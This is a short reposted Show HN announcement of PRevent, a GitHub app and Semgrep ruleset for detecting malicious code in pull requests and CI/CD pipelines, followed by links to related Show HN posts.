Show HN: I built a PR listener and ruleset to detect malicious code in CI/CD I built a GitHub app that detects it in pull requests, notifies or blocks them. Alongside it, I published a Semgrep ruleset for any stage of the CI/CD. I started this after getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it. Having said that, it's still a major attack vector - a stored RCE, with the codebase itself as the sink. Feedback is appreciated. The app, PRevent - https://ift.tt/UXw5gAu The ruleset: https://ift.tt/rKYFkP7 The research: https://ift.tt/KoSCWZz... https://ift.tt/UXw5gAu February 26, 2025 at 12:52AM
Show HN: I built a PR listener and ruleset to detect malicious code in CI/CD https://ift.tt/UwNfgI6
Related Articles
Show HN: Find out if your area could be affected by a nuclear event https://ift.tt/8yO1nu5
Show HN: D&D meets Siri – Interactive voice adventure https://ift.tt/E8rgp4d
Show HN: Warehouse OpenAI requests to your own database https://ift.tt/4QN8wzZ
Show HN: Open-source study to measure end user satisfaction levels with LLMs https://ift.tt/3ksGSYJ
Show HN: Fix or Skip? https://ift.tt/iw4ubNC
Show HN: Live Subtitles for Any App on Mac https://ift.tt/l78AuwP
Show HN: Open-source alternative to Loom that only requires S3 https://ift.tt/QRYa4qf
Show HN: Repo2vec – an open-source library for chatting with any codebase https://ift.tt/7LNUaiJ
0 Comments: